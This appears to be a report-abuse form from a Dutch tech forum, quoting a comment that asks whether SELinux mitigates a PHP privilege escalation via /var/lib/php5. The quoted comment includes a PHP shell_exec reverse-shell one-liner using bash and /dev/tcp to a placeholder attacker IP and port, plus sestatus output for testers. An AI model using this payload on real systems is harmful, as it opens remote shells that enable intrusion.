Je hebt een klacht over de onderstaande posting:
@ anoniem van 9:34 /var/lib/php5 privilege escalatie - Is het volgende in SECLinux gemitigeerd? Meestal draait het toch al onder zeer beperkte rechten. Rond SELinux werken kan een aanvaller met een shell command als echo shell_exec('cd /tmp && exec /bin/bash 0</dev/tcp/-attackersip-/-attackersport- 1>&0 2>&0 &'); Alhoewel shell file ("0") en directory moeten wel worden veranderd. De shell is dus wel sterk beperkt, enerzijds door SELinux, anderzijds wellicht bij voorbeeld via apache etc. "/usr/bin/dir" zit misschien niet op slot bij SELinux, dus is /usr/bin/dir -al /tmp wellicht mogelijk. Om uit te proberen door een tester: sestatus -v SELinux status: enabled SELinuxfs mount: /selinux Current mode: unknown (Permission denied) Mode from config file: error (Permission denied) Policy version: unknown (Permission denied) Policy from config file: targeted Process contexts: Current context: ...
Beschrijf je klacht (Optioneel):